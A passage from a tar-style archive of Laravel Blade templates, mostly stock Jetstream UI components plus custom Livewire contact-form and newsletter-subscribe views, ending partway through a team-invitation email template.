01.75-.75h6.638L10.23 7.29a.75.75 0 111.04-1.08l3.5 3.25a.75.75 0 010 1.08l-3.5 3.25a.75.75 0 11-1.04-1.08l2.158-1.96H5.75A.75.75 0 015 10z" clip-rule="evenodd" /> </svg> </a> </p> </div> <div> <div class="flex items-center"> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="w-6 h-6 stroke-gray-400"> <path stroke-linecap="round" d="M15.75 10.5l4.72-4.72a.75.75 0 011.28.53v11.38a.75.75 0 01-1.28.53l-4.72-4.72M4.5 18.75h9a2.25 2.25 0 002.25-2.25v-9a2.25 2.25 0 00-2.25-2.25h-9A2.25 2.25 0 002.25 7.5v9a2.25 2.25 0 002.25 2.25z" /> </svg> <h2 class="ml-3 text-xl font-semibold text-gray-900"> <a href="https://laracasts.com">Laracasts</a> </h2> </div> <p class="mt-4 text-gray-500 text-sm leading-relaxed"> Laracasts offers thousands of video tutorials on Laravel, PHP, and JavaScript development. Check them out, see for yourself, and massively level up your development skills in the process. </p> <p class="mt-4 text-sm"> <a href="https://laracasts.com" class="inline-flex items-center font-semibold text-indigo-700"> Start watching Laracasts <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" class="ml-1 w-5 h-5 fill-indigo-500"> <path fill-rule="evenodd" d="M5 10a.75.75 0 01.75-.75h6.638L10.23 7.29a.75.75 0 111.04-1.08l3.5 3.25a.75.75 0 010 1.08l-3.5 3.25a.75.75 0 11-1.04-1.08l2.158-1.96H5.75A.75.75 0 015 10z" clip-rule="evenodd" /> </svg> </a> </p> </div> <div> <div class="flex items-center"> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="w-6 h-6 stroke-gray-400"> <path stroke-linecap="round" stroke-linejoin="round" d="M2.25 15.75l5.159-5.159a2.25 2.25 0 013.182 0l5.159 5.159m-1.5-1.5l1.409-1.409a2.25 2.25 0 013.182 0l2.909 2.909m-18 3.75h16.5a1.5 1.5 0 001.5-1.5V6a1.5 1.5 0 00-1.5-1.5H3.75A1.5 1.5 0 002.25 6v12a1.5 1.5 0 001.5 1.5zm10.5-11.25h.008v.008h-.008V8.25zm.375 0a.375.375 0 11-.75 0 .375.375 0 01.75 0z" /> </svg> <h2 class="ml-3 text-xl font-semibold text-gray-900"> <a href="https://tailwindcss.com/">Tailwind</a> </h2> </div> <p class="mt-4 text-gray-500 text-sm leading-relaxed"> Laravel Jetstream is built with Tailwind, an amazing utility first CSS framework that doesn't get in your way. You'll be amazed how easily you can build and maintain fresh, modern designs with this wonderful framework at your fingertips. </p> </div> <div> <div class="flex items-center"> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="w-6 h-6 stroke-gray-400"> <path stroke-linecap="round" stroke-linejoin="round" d="M16.5 10.5V6.75a4.5 4.5 0 10-9 0v3.75m-.75 11.25h10.5a2.25 2.25 0 002.25-2.25v-6.75a2.25 2.25 0 00-2.25-2.25H6.75a2.25 2.25 0 00-2.25 2.25v6.75a2.25 2.25 0 002.25 2.25z" /> </svg> <h2 class="ml-3 text-xl font-semibold text-gray-900"> Authentication </h2> </div> <p class="mt-4 text-gray-500 text-sm leading-relaxed"> Authentication and registration views are included with Laravel Jetstream, as well as support for user email verification and resetting forgotten passwords. So, you're free to get started with what matters most: building your application. </p> </div> </div> ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/responsive-nav-link.blade.php������������������������������������������������������0000644�����������������00000001256�14765366572�0015610 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['active']) @php $classes = ($active ?? false) ? 'block w-full pl-3 pr-4 py-2 border-l-4 border-indigo-400 text-left text-base font-medium text-indigo-700 bg-indigo-50 focus:outline-none focus:text-indigo-800 focus:bg-indigo-100 focus:border-indigo-700 transition duration-150 ease-in-out' : 'block w-full pl-3 pr-4 py-2 border-l-4 border-transparent text-left text-base font-medium text-gray-600 hover:text-gray-800 hover:bg-gray-50 hover:border-gray-300 focus:outline-none focus:text-gray-800 focus:bg-gray-50 focus:border-gray-300 transition duration-150 ease-in-out'; @endphp <a {{ $attributes->merge(['class' => $classes]) }}> {{ $slot }} </a> ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/validation-errors.blade.php��������������������������������������������������������0000644�����������������00000000543�14765366572�0015340 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($errors->any()) <div {{ $attributes }}> <div class="font-medium text-red-600">{{ __('Whoops! Something went wrong.') }}</div> <ul class="mt-3 list-disc list-inside text-sm text-red-600"> @foreach ($errors->all() as $error) <li>{{ $error }}</li> @endforeach </ul> </div> @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/section-title.blade.php������������������������������������������������������������0000644�����������������00000000514�14765366572�0014455 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div class="md:col-span-1 flex justify-between"> <div class="px-4 sm:px-0"> <h3 class="text-lg font-medium text-gray-900">{{ $title }}</h3> <p class="mt-1 text-sm text-gray-600"> {{ $description }} </p> </div> <div class="px-4 sm:px-0"> {{ $aside ?? '' }} </div> </div> ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/confirms-password.blade.php��������������������������������������������������������0000644�����������������00000003203�14765366572�0015350 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['title' => __('Confirm Password'), 'content' => __('For your security, please confirm your password to continue.'), 'button' => __('Confirm')]) @php $confirmableId = md5($attributes->wire('then')); @endphp <span {{ $attributes->wire('then') }} x-data x-ref="span" x-on:click="$wire.startConfirmingPassword('{{ $confirmableId }}')" x-on:password-confirmed.window="setTimeout(() => $event.detail.id === '{{ $confirmableId }}' && $refs.span.dispatchEvent(new CustomEvent('then', { bubbles: false })), 250);" > {{ $slot }} </span> @once <x-dialog-modal wire:model="confirmingPassword"> <x-slot name="title"> {{ $title }} </x-slot> <x-slot name="content"> {{ $content }} <div class="mt-4" x-data="{}" x-on:confirming-password.window="setTimeout(() => $refs.confirmable_password.focus(), 250)"> <x-input type="password" class="mt-1 block w-3/4" placeholder="{{ __('Password') }}" autocomplete="current-password" x-ref="confirmable_password" wire:model.defer="confirmablePassword" wire:keydown.enter="confirmPassword" /> <x-input-error for="confirmable_password" class="mt-2" /> </div> </x-slot> <x-slot name="footer"> <x-secondary-button wire:click="stopConfirmingPassword" wire:loading.attr="disabled"> {{ __('Cancel') }} </x-secondary-button> <x-button class="ml-3" dusk="confirm-password-button" wire:click="confirmPassword" wire:loading.attr="disabled"> {{ $button }} </x-button> </x-slot> </x-dialog-modal> @endonce ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/banner.blade.php�������������������������������������������������������������������0000644�����������������00000006113�14765366572�0013140 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['style' => session('flash.bannerStyle', 'success'), 'message' => session('flash.banner')]) <div x-data="{{ json_encode(['show' => true, 'style' => $style, 'message' => $message]) }}" :class="{ 'bg-indigo-500': style == 'success', 'bg-red-700': style == 'danger', 'bg-gray-500': style != 'success' && style != 'danger' }" style="display: none;" x-show="show && message" x-init=" document.addEventListener('banner-message', event => { style = event.detail.style; message = event.detail.message; show = true; }); "> <div class="max-w-screen-xl mx-auto py-2 px-3 sm:px-6 lg:px-8"> <div class="flex items-center justify-between flex-wrap"> <div class="w-0 flex-1 flex items-center min-w-0"> <span class="flex p-2 rounded-lg" :class="{ 'bg-indigo-600': style == 'success', 'bg-red-600': style == 'danger' }"> <svg x-show="style == 'success'" class="h-5 w-5 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" d="M9 12.75L11.25 15 15 9.75M21 12a9 9 0 11-18 0 9 9 0 0118 0z" /> </svg> <svg x-show="style == 'danger'" class="h-5 w-5 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" d="M12 9v3.75m9-.75a9 9 0 11-18 0 9 9 0 0118 0zm-9 3.75h.008v.008H12v-.008z" /> </svg> <svg x-show="style != 'success' && style != 'danger'" class="h-5 w-5 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" d="M11.25 11.25l.041-.02a.75.75 0 011.063.852l-.708 2.836a.75.75 0 001.063.853l.041-.021M21 12a9 9 0 11-18 0 9 9 0 0118 0zm-9-3.75h.008v.008H12V8.25z" /> </svg> </span> <p class="ml-3 font-medium text-sm text-white truncate" x-text="message"></p> </div> <div class="shrink-0 sm:ml-3"> <button type="button" class="-mr-1 flex p-2 rounded-md focus:outline-none sm:-mr-2 transition" :class="{ 'hover:bg-indigo-600 focus:bg-indigo-600': style == 'success', 'hover:bg-red-600 focus:bg-red-600': style == 'danger' }" aria-label="Dismiss" x-on:click="show = false"> <svg class="h-5 w-5 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" d="M6 18L18 6M6 6l12 12" /> </svg> </button> </div> </div> </div> </div> �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/nav-link.blade.php�����������������������������������������������������������������0000644�����������������00000001135�14765366572�0013411 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['active']) @php $classes = ($active ?? false) ? 'inline-flex items-center px-1 pt-1 border-b-2 border-indigo-400 text-sm font-medium leading-5 text-gray-900 focus:outline-none focus:border-indigo-700 transition duration-150 ease-in-out' : 'inline-flex items-center px-1 pt-1 border-b-2 border-transparent text-sm font-medium leading-5 text-gray-500 hover:text-gray-700 hover:border-gray-300 focus:outline-none focus:text-gray-700 focus:border-gray-300 transition duration-150 ease-in-out'; @endphp <a {{ $attributes->merge(['class' => $classes]) }}> {{ $slot }} </a> �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/input.blade.php��������������������������������������������������������������������0000644�����������������00000000307�14765366572�0013031 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['disabled' => false]) <input {{ $disabled ? 'disabled' : '' }} {!! $attributes->merge(['class' => 'border-gray-300 focus:border-indigo-500 focus:ring-indigo-500 rounded-md shadow-sm']) !!}> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/switchable-team.blade.php����������������������������������������������������������0000644�����������������00000001574�14765366572�0014752 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['team', 'component' => 'dropdown-link']) <form method="POST" action="{{ route('current-team.update') }}" x-data> @method('PUT') @csrf <!-- Hidden Team ID --> <input type="hidden" name="team_id" value="{{ $team->id }}"> <x-dynamic-component :component="$component" href="#" x-on:click.prevent="$root.submit();"> <div class="flex items-center"> @if (Auth::user()->isCurrentTeam($team)) <svg class="mr-2 h-5 w-5 text-green-400" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" d="M9 12.75L11.25 15 15 9.75M21 12a9 9 0 11-18 0 9 9 0 0118 0z" /> </svg> @endif <div class="truncate">{{ $team->name }}</div> </div> </x-dynamic-component> </form> ������������������������������������������������������������������������������������������������������������������������������������views/components/button.blade.php�������������������������������������������������������������������0000644�����������������00000000624�14765366572�0013207 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<button {{ $attributes->merge(['type' => 'submit', 'class' => 'inline-flex items-center px-4 py-2 bg-gray-800 border border-transparent rounded-md font-semibold text-xs text-white uppercase tracking-widest hover:bg-gray-700 focus:bg-gray-700 active:bg-gray-900 focus:outline-none focus:ring-2 focus:ring-indigo-500 focus:ring-offset-2 transition ease-in-out duration-150']) }}> {{ $slot }} </button> ������������������������������������������������������������������������������������������������������������views/components/modal.blade.php��������������������������������������������������������������������0000644�����������������00000003406�14765366572�0012771 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['id', 'maxWidth']) @php $id = $id ?? md5($attributes->wire('model')); $maxWidth = [ 'sm' => 'sm:max-w-sm', 'md' => 'sm:max-w-md', 'lg' => 'sm:max-w-lg', 'xl' => 'sm:max-w-xl', '2xl' => 'sm:max-w-2xl', ][$maxWidth ?? '2xl']; @endphp <div x-data="{ show: @entangle($attributes->wire('model')).defer }" x-on:close.stop="show = false" x-on:keydown.escape.window="show = false" x-show="show" id="{{ $id }}" class="jetstream-modal fixed inset-0 overflow-y-auto px-4 py-6 sm:px-0 z-50" style="display: none;" > <div x-show="show" class="fixed inset-0 transform transition-all" x-on:click="show = false" x-transition:enter="ease-out duration-300" x-transition:enter-start="opacity-0" x-transition:enter-end="opacity-100" x-transition:leave="ease-in duration-200" x-transition:leave-start="opacity-100" x-transition:leave-end="opacity-0"> <div class="absolute inset-0 bg-gray-500 opacity-75"></div> </div> <div x-show="show" class="mb-6 bg-white rounded-lg overflow-hidden shadow-xl transform transition-all sm:w-full {{ $maxWidth }} sm:mx-auto" x-trap.inert.noscroll="show" x-transition:enter="ease-out duration-300" x-transition:enter-start="opacity-0 translate-y-4 sm:translate-y-0 sm:scale-95" x-transition:enter-end="opacity-100 translate-y-0 sm:scale-100" x-transition:leave="ease-in duration-200" x-transition:leave-start="opacity-100 translate-y-0 sm:scale-100" x-transition:leave-end="opacity-0 translate-y-4 sm:translate-y-0 sm:scale-95"> {{ $slot }} </div> </div> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/checkbox.blade.php�����������������������������������������������������������������0000644�����������������00000000213�14765366572�0013454 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<input type="checkbox" {!! $attributes->merge(['class' => 'rounded border-gray-300 text-indigo-600 shadow-sm focus:ring-indigo-500']) !!}> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/dialog-modal.blade.php�������������������������������������������������������������0000644�����������������00000000705�14765366572�0014225 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['id' => null, 'maxWidth' => null]) <x-modal :id="$id" :maxWidth="$maxWidth" {{ $attributes }}> <div class="px-6 py-4"> <div class="text-lg font-medium text-gray-900"> {{ $title }} </div> <div class="mt-4 text-sm text-gray-600"> {{ $content }} </div> </div> <div class="flex flex-row justify-end px-6 py-4 bg-gray-100 text-right"> {{ $footer }} </div> </x-modal> �����������������������������������������������������������views/components/input-error.blade.php��������������������������������������������������������������0000644�����������������00000000200�14765366572�0014150 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['for']) @error($for) <p {{ $attributes->merge(['class' => 'text-sm text-red-600']) }}>{{ $message }}</p> @enderror ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/section-border.blade.php�����������������������������������������������������������0000644�����������������00000000174�14765366572�0014613 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div class="hidden sm:block"> <div class="py-8"> <div class="border-t border-gray-200"></div> </div> </div> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/application-logo.blade.php���������������������������������������������������������0000644�����������������00000006466�14765366572�0015147 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<svg viewBox="0 0 317 48" fill="none" xmlns="http://www.w3.org/2000/svg" {{ $attributes }}> <path d="M74.09 30.04V13h-4.14v21H82.1v-3.96h-8.01zM95.379 19v1.77c-1.08-1.35-2.7-2.19-4.89-2.19-3.99 0-7.29 3.45-7.29 7.92s3.3 7.92 7.29 7.92c2.19 0 3.81-.84 4.89-2.19V34h3.87V19h-3.87zm-4.17 11.73c-2.37 0-4.14-1.71-4.14-4.23 0-2.52 1.77-4.23 4.14-4.23 2.4 0 4.17 1.71 4.17 4.23 0 2.52-1.77 4.23-4.17 4.23zM106.628 21.58V19h-3.87v15h3.87v-7.17c0-3.15 2.55-4.05 4.56-3.81V18.7c-1.89 0-3.78.84-4.56 2.88zM124.295 19v1.77c-1.08-1.35-2.7-2.19-4.89-2.19-3.99 0-7.29 3.45-7.29 7.92s3.3 7.92 7.29 7.92c2.19 0 3.81-.84 4.89-2.19V34h3.87V19h-3.87zm-4.17 11.73c-2.37 0-4.14-1.71-4.14-4.23 0-2.52 1.77-4.23 4.14-4.23 2.4 0 4.17 1.71 4.17 4.23 0 2.52-1.77 4.23-4.17 4.23zM141.544 19l-3.66 10.5-3.63-10.5h-4.26l5.7 15h4.41l5.7-15h-4.26zM150.354 28.09h11.31c.09-.51.15-1.02.15-1.59 0-4.41-3.15-7.92-7.59-7.92-4.71 0-7.92 3.45-7.92 7.92s3.18 7.92 8.22 7.92c2.88 0 5.13-1.17 6.54-3.21l-3.12-1.8c-.66.87-1.86 1.5-3.36 1.5-2.04 0-3.69-.84-4.23-2.82zm-.06-3c.45-1.92 1.86-3.03 3.93-3.03 1.62 0 3.24.87 3.72 3.03h-7.65zM164.516 34h3.87V12.1h-3.87V34zM185.248 34.36c3.69 0 6.9-2.01 6.9-6.3V13h-2.1v15.06c0 3.03-2.07 4.26-4.8 4.26-2.19 0-3.93-.78-4.62-2.61l-1.77 1.05c1.05 2.43 3.57 3.6 6.39 3.6zM203.124 18.64c-4.65 0-7.83 3.45-7.83 7.86 0 4.53 3.24 7.86 7.98 7.86 3.03 0 5.34-1.41 6.6-3.45l-1.74-1.02c-.81 1.44-2.46 2.55-4.83 2.55-3.18 0-5.55-1.89-5.97-4.95h13.17c.03-.3.06-.63.06-.93 0-4.11-2.85-7.92-7.44-7.92zm0 1.92c2.58 0 4.98 1.71 5.4 5.01h-11.19c.39-2.94 2.64-5.01 5.79-5.01zM221.224 20.92V19h-4.32v-4.2l-1.98.6V19h-3.15v1.92h3.15v9.09c0 3.6 2.25 4.59 6.3 3.99v-1.74c-2.91.12-4.32.33-4.32-2.25v-9.09h4.32zM225.176 22.93c0-1.62 1.59-2.37 3.15-2.37 1.44 0 2.97.57 3.6 2.1l1.65-.96c-.87-1.86-2.79-3.06-5.25-3.06-3 0-5.13 1.89-5.13 4.29 0 5.52 8.76 3.39 8.76 7.11 0 1.77-1.68 2.4-3.45 2.4-2.01 0-3.57-.99-4.11-2.52l-1.68.99c.75 1.92 2.79 3.45 5.79 3.45 3.21 0 5.43-1.77 5.43-4.32 0-5.52-8.76-3.39-8.76-7.11zM244.603 20.92V19h-4.32v-4.2l-1.98.6V19h-3.15v1.92h3.15v9.09c0 3.6 2.25 4.59 6.3 3.99v-1.74c-2.91.12-4.32.33-4.32-2.25v-9.09h4.32zM249.883 21.49V19h-1.98v15h1.98v-8.34c0-3.72 2.34-4.98 4.74-4.98v-1.92c-1.92 0-3.69.63-4.74 2.73zM263.358 18.64c-4.65 0-7.83 3.45-7.83 7.86 0 4.53 3.24 7.86 7.98 7.86 3.03 0 5.34-1.41 6.6-3.45l-1.74-1.02c-.81 1.44-2.46 2.55-4.83 2.55-3.18 0-5.55-1.89-5.97-4.95h13.17c.03-.3.06-.63.06-.93 0-4.11-2.85-7.92-7.44-7.92zm0 1.92c2.58 0 4.98 1.71 5.4 5.01h-11.19c.39-2.94 2.64-5.01 5.79-5.01zM286.848 19v2.94c-1.26-2.01-3.39-3.3-6.06-3.3-4.23 0-7.74 3.42-7.74 7.86s3.51 7.86 7.74 7.86c2.67 0 4.8-1.29 6.06-3.3V34h1.98V19h-1.98zm-5.91 13.44c-3.33 0-5.91-2.61-5.91-5.94 0-3.33 2.58-5.94 5.91-5.94s5.91 2.61 5.91 5.94c0 3.33-2.58 5.94-5.91 5.94zM309.01 18.64c-1.92 0-3.75.87-4.86 2.73-.84-1.74-2.46-2.73-4.56-2.73-1.8 0-3.42.72-4.59 2.55V19h-1.98v15H295v-8.31c0-3.72 2.16-5.13 4.32-5.13 2.13 0 3.51 1.41 3.51 4.08V34h1.98v-8.31c0-3.72 1.86-5.13 4.17-5.13 2.13 0 3.66 1.41 3.66 4.08V34h1.98v-9.36c0-3.75-2.31-6-5.61-6z" class="fill-black"/> <path d="M11.395 44.428C4.557 40.198 0 32.632 0 24 0 10.745 10.745 0 24 0a23.891 23.891 0 0113.997 4.502c-.2 17.907-11.097 33.245-26.602 39.926z" fill="#6875F5"/> <path d="M14.134 45.885A23.914 23.914 0 0024 48c13.255 0 24-10.745 24-24 0-3.516-.756-6.856-2.115-9.866-4.659 15.143-16.608 27.092-31.75 31.751z" fill="#6875F5"/> </svg> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/components/application-mark.blade.php���������������������������������������������������������0000644�����������������00000000654�14765366572�0015132 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<svg viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg" {{ $attributes }}> <path d="M11.395 44.428C4.557 40.198 0 32.632 0 24 0 10.745 10.745 0 24 0a23.891 23.891 0 0113.997 4.502c-.2 17.907-11.097 33.245-26.602 39.926z" fill="#6875F5"/> <path d="M14.134 45.885A23.914 23.914 0 0024 48c13.255 0 24-10.745 24-24 0-3.516-.756-6.856-2.115-9.866-4.659 15.143-16.608 27.092-31.75 31.751z" fill="#6875F5"/> </svg> ������������������������������������������������������������������������������������views/components/form-section.blade.php�������������������������������������������������������������0000644�����������������00000001612�14765366572�0014277 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['submit']) <div {{ $attributes->merge(['class' => 'md:grid md:grid-cols-3 md:gap-6']) }}> <x-section-title> <x-slot name="title">{{ $title }}</x-slot> <x-slot name="description">{{ $description }}</x-slot> </x-section-title> <div class="mt-5 md:mt-0 md:col-span-2"> <form wire:submit.prevent="{{ $submit }}"> <div class="px-4 py-5 bg-white sm:p-6 shadow {{ isset($actions) ? 'sm:rounded-tl-md sm:rounded-tr-md' : 'sm:rounded-md' }}"> <div class="grid grid-cols-6 gap-6"> {{ $form }} </div> </div> @if (isset($actions)) <div class="flex items-center justify-end px-4 py-3 bg-gray-50 text-right sm:px-6 shadow sm:rounded-bl-md sm:rounded-br-md"> {{ $actions }} </div> @endif </form> </div> </div> ����������������������������������������������������������������������������������������������������������������������views/components/confirmation-modal.blade.php�������������������������������������������������������0000644�����������������00000002370�14765366572�0015456 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@props(['id' => null, 'maxWidth' => null]) <x-modal :id="$id" :maxWidth="$maxWidth" {{ $attributes }}> <div class="bg-white px-4 pt-5 pb-4 sm:p-6 sm:pb-4"> <div class="sm:flex sm:items-start"> <div class="mx-auto shrink-0 flex items-center justify-center h-12 w-12 rounded-full bg-red-100 sm:mx-0 sm:h-10 sm:w-10"> <svg class="h-6 w-6 text-red-600" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" d="M12 9v3.75m-9.303 3.376c-.866 1.5.217 3.374 1.948 3.374h14.71c1.73 0 2.813-1.874 1.948-3.374L13.949 3.378c-.866-1.5-3.032-1.5-3.898 0L2.697 16.126zM12 15.75h.007v.008H12v-.008z" /> </svg> </div> <div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left"> <h3 class="text-lg font-medium text-gray-900"> {{ $title }} </h3> <div class="mt-4 text-sm text-gray-600"> {{ $content }} </div> </div> </div> </div> <div class="flex flex-row justify-end px-6 py-4 bg-gray-100 text-right"> {{ $footer }} </div> </x-modal> ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/livewire/contact-easier.blade.php�������������������������������������������������������������0000644�����������������00000006115�14765366572�0014237 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div> @if ($style == 'style1') <div class="contact-form-wrap"> <form wire:submit="save" id="contactForm"> <div class="row"> <div class="col-md-6"> <div class="contact-form-group"> <input type="text" class="form-control" wire:model="name" placeholder="{{ __('frontend.name') }}" required> <div class="form-validate-icons"> <span></span> </div> </div> </div> <div class="col-md-6"> <div class="contact-form-group"> <input type="email" class="form-control" wire:model="email" placeholder="{{ __('frontend.email') }}" required> <div class="form-validate-icons"> <span></span> </div> </div> </div> <div class="col-md-12"> <div class="contact-form-group"> <input type="text" class="form-control" wire:model="phone" placeholder="{{ __('frontend.phone') }}" required> <div class="form-validate-icons"> <span></span> </div> </div> </div> <div class="col-md-12"> <div class="contact-form-group"> <textarea wire:model="message" class="form-control" placeholder="{{ __('frontend.your_message') }}" cols="20" rows="8"></textarea> <div class="form-validate-icons"> <span></span> </div> </div> </div> <div class="col-md-12 text-center"> <div class="form-alerts"> @error('name') <span class="error">{{ $message }}</span> @enderror @error('email') <span class="error">{{ $message }}</span> @enderror @error('phone') <span class="error">{{ $message }}</span> @enderror @error('message') <span class="error">{{ $message }}</span> @enderror @if($message = Session::get('success')) <span class="error">{{ __($message) }}</span> @endif </div> <div class="contact-btn-left"> <button type="submit" id="contactBtn" class="primary-btn"> <span class="text">{{ __('frontend.send_message') }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </button> </div> </div> </div> </form> </div> @endif </div> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/livewire/subscribe-post-easier.blade.php������������������������������������������������������0000644�����������������00000011107�14765366572�0015545 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div> @if ($style == 'style1') @if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Subscribe Section Start //--> <div class="subscribe-section section"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($subscribe) <div class="row justify-content-center"> <div class="col-lg-8"> <div class="subscribe-heading"> <h2>{{ $subscribe->title }}</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-8"> <div class="subscribe-heading"> <h2>Subscribe to the newsletter to be informed about us</h2> </div> </div> </div> @endif @endisset <form wire:submit="save"> <div class="subscribe-form-group"> <input type="email" wire:model="email" class="subscribe-form-input" placeholder="{{ __('frontend.enter_your_email') }}"> <button type="submit" class="white-btn"> <span class="text">{{ __('frontend.subscribe') }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </button> </div> <div class="mt-2 text-white text-center"> @error('email') <span class="error">{{ $message }}</span> @enderror @if($message = Session::get('success')) <span class="error">{{ __($message) }}</span> @endif </div> </form> </div> </div> <!--// Subscribe Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="subscribe-section.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-plus text-white"></i> {{ __('content.edit_subscribe') }}</button> </form> </div> </div> @endcan @endif @endif </div> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/emails/team-invitation.blade.php��������������������������������������������������������������0000644�����������������00000001631�14765366572�0014070 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@component('mail::message') {{ __('You have been invited to join the :team team!', ['team' => $invitation->team->name]) }} @if (Laravel\Fortify\Features::enabled(Laravel\Fortify\Features::registration())) {{ __('If you do not have an account, you may create one by clicking the button below. After creating an account, you may click the invitation 